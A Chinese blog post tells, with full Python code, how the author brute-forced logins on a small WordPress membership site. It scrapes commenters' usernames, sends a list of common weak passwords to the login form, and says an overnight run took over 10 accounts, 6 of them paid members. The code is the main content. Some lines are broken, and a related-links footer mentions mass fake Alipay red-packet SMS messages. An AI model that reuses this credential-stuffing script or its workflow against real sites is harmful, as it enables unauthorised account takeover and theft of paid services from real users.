手机充值业务python_小伙利用Python爆破某会员网站,充会员?不存在的!
暑假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。
是吗
然后就有了思路(骚操作)(私信小编“01”即可获取各类Python入门学习资料哦!)
先讲一下思路
1 .先注册用户登录
2.flidder抓包
3.python 模拟登录
4.在评论区抓取评论的用户名
5.弱密码爆破
登录
登录页面如下
登录页面.png
flidder抓包
抓包之后发现有以下几个字段
'log': 'admin', # 用户名
'pwd': 'admin', # 密码
'wp-submit': '登录',
'redirect_to': '',
'wpuf_login': 'true',
'action': 'login',
'_wpnonce': '4b4e82f670',
'_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'
只要用户名和密码不同,其他的不变
python 模拟登录
这部分就比较简单,用到requests模块
import re
import requests
def baopo(log):
url = 'http://XXXXXX.com/%e7%99%bb%e5%bd%95'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Referer': 'http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true' #网站打码
}
data = {
'log': log,
'pwd': 'admin',
'wp-submit': '登录',
'redirect_to': '',
'wpuf_login': 'true',
'action': 'login',
'_wpnonce': '4b4e82f670',
'_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'
}
a = requests.post(url, headers=headers, data=data)
if a.history == []:
return False
else:
return True
得到用户名
这部分主要用到正则模块匹配就行了
import re
import requests
def gethtml(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Referer': 'http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true'
}
html = requests.get(url, headers=headers)
return html.text
for i in range(30,36):
if i == 1:
url = 'http:/XXXXXX.com/'
else:
url = 'http://XXXXXXX.com/page/' + str(i)
html = gethtml(url)
for each in re.findall('
print(each)
if int(each[-4:].replace('/','').replace('s','')) < 100:
for each2 in re.findall('(.*?):', gethtml(each)):
if 'href' in each2:
each2 = re.findall("class='url'>(.*?)
", each2)[0]
f = open('yonghu.txt','a+',encoding='utf-8')
f.write(each2)
f.write('
')
f.close()
print(each2)
得到用户名保存在yonghu.txt文件里
开始爆破
本来想加上多线程,但因为网站太垃圾了,访问过快会限制,那就算了吧。。。
import requests
import multiprocessing
def baopo(log):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
}
pwd =['000000','111111','11111111','112233','123123','123321','123456','12345678','654321','666666','888888','abcdef','abcabc',
'abc123','a1b2c3','aaa111','123qwe','qwerty','qweasd','admin',
'password','p@ssword','passwd','iloveyou','5201314','88888888','147258369','1234567890']
pwd.append(log)
for each in pwd:
print('using>>>'+each)
data = {
'log': log,
'pwd': each,
'wp-submit': '登录',
'redirect_to': '',
'wpuf_login': 'true',
'action': 'login',
'_wpnonce': '4b4e82f670',
'_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'
}
a = requests.post(url, headers=headers, data=data)
if a.history == []:
continue
else:
f = open('success.txt','a+',encoding='utf-8')
f.write('User:')
f.write(log)
f.write(' Passwd:')
f.write(each)
print('succeed! ')
return True
f = open('yonghu.txt','r', encoding='utf-8')
yonghuming = set()
yonghuming.add('adminn')
for line in f.readlines():
line = line.strip()
yonghuming.add(line)
if __name__ == '__main__':
for each in yonghuming:
#p = multiprocessing.Process(target=baopo, args=(each,))
#p.start()
print(each)
baopo(each)
#print(yonghuming)
运行效果图
运行效果
成功爆破
收获
timg.jpg
放在服务器上跑了一晚,爆出来10个账号,其中6个充值了会员,美吱吱
手机充值业务python_小伙利用Python爆破某会员网站,充会员?不存在的!相关推荐
- python发微信红包群二维码_小伙利用Python群发“支付宝”红包短信,一天赏金可达上千元...
原标题:小伙利用Python群发"支付宝"红包短信,一天赏金可达上千元 注:以下教程仅供学习交流,娱乐而已,切勿用在非法途径 前言 最近朋友圈.微信群.QQ群里面全是什么扫码领取支 ...
- python推箱子小游戏_小伙利用Python自制一个推箱子小游戏!
原标题:小伙利用Python自制一个推箱子小游戏! 导语 月初更波python制作小游戏系列吧用python写了个推箱子小游戏,在这里分享给大家,让我们愉快地开始吧 小伙利用Python自制一个推箱子 ...
- windows和Linux利用Python快速搭建一个网站
windows和Linux利用Python快速搭建一个网站 一.windows 步骤1:安装Python3(自行百度) 步骤2:在cmd窗口输入ipconfig查看本机ip地址,IPV4那一行.如:1 ...
- 宝可梦 图片识别python_初探利用Python进行图文识别(OCR)
话说什么是OCR????? 简介 OCR技术是光学字符识别的缩写(Optical Character Recognition),是通过扫描等光学输入方式将各种票据.报刊.书籍.文稿及其它印刷品的文字转 ...
- json字段顺序读取 python_如何利用Python批量读取视频文件的时间长度?
本期的主题是利用Python来实现对视频文件时间长度的读取. 在学习编程语言时,相比较于通过书本来学习知识,我更喜欢通过观看学习视频的方式来进行学习,通过主讲老师的讲解,我能很直观且快速的了解一些知识 ...
- 小伙利用Python绘制999种玫瑰花表白女神,会编程男孩子真好
前言 Python的应用领域非常的广泛,可以做web开发.爬虫.自动化.数据分析.人工智能 等等,对于绘画,Python也是有一个专门的库:turtle. 利用python绘制一朵玫瑰,快拿去送给你心 ...
- 利用Python爬取翻译网站的翻译功能
现在我想分享一个利用Python技术,爬取一个翻译网站的翻译功能的小代码. 首先隆重介绍我们今天将要爬取的网站:http://fy.iciba.com/ 咱们用Python中的urllib模块的功能进 ...
- python爬取外文文献翻译_利用Python爬取翻译网站的翻译功能
现在我想分享一个利用Python技术,爬取一个翻译网站的翻译功能的小代码. 首先隆重介绍我们今天将要爬取的网站:http://fy.iciba.com/ 咱们用Python中的urllib模块的功能进 ...
- vps建网站python_如何使用python搭建一个小网站 ?
作为一名程序员,还是必须要会开发网站的,不然别人都会怀疑你是不是程序员了.今天,主要介绍一下如何使用python来搭建一个网站.可能有人会觉得搭建网站不都应该用java么?python的性能那么低.的 ...
最新文章
- 分析与设计(AD)简介(1)
- python表格控件_python GUI库图形界面开发之PyQt5表格控件QTableView详细使用方法与实例...
- 利用ngxtop实时监控nginx的访问情况
- python opencv 边缘检测_opencv-python-学习笔记十四(Canny边缘检测)
- 虚拟化帮您打造绿色数据中心
- SQL语句错误:Operand should contain 1 column(s)【查询多个字段不用加括号】
- python做请求转发_RequestDispatcher实现请求转发
- jboss fuse 教程_JBoss Fuse –使用MVEL将您的静态配置转换为动态模板
- vivo 5G手机日产量10万台 3月销量同比增长超10%
- Java操作word文件的工具选择
- 朗读评价语言集锦_教师-课堂评价语言集锦.doc
- Eclipse安装反编译工具Eclipse Class Decompiler:实现不下载源码,查看源文件
- pgm概率图模型_概率图形模型(PGM)算法| 机器学习
- 从吃凉的就会肚子疼,不敢吃可爱多以下的雪糕,吃饱后去逛街肚子就会胀,到后来吃饭的时候就胃疼解决办法
- Excel批量调整图片大小适应单元格且整齐排列
- 10 行 Python 代码能实现哪些有趣功能?
- 腾讯发布的开发语言安全指南:Javascript安全指南
- 企业集成平台 Cloud Hub 5.3版本发布 [EAI、B2BI、EDI、数据集成平台]
- gb酱油和gbt酱油哪个好_酱油那个gb18186是纯酿造的吗
- 字节流之文件输入流FileInputStream(上)
热门文章
- html怎么设置取消隐藏,怎么取消wifi隐藏_取消隐藏wifi设置方法-192路由网
- 连分数与丢番图方程简介
- 【视频相关】视频中常出现的参数解释——2018年6月16日
- 字符串分隔StringUtils.delimitedListToStringArray
- 浏览器劫持解决:解决浏览器的捆绑问题
- Mac 通过openCV打开摄像头权限
- 《教父II:西西里人》 shbp--3
- 关于LocalDateTime的全局返回时间带“T“的时间格式处理
- word删除页眉线,添加第几页共几页
- S2SH水费管理系统-JAVA【毕业设计、快速开发、源码、开题报告】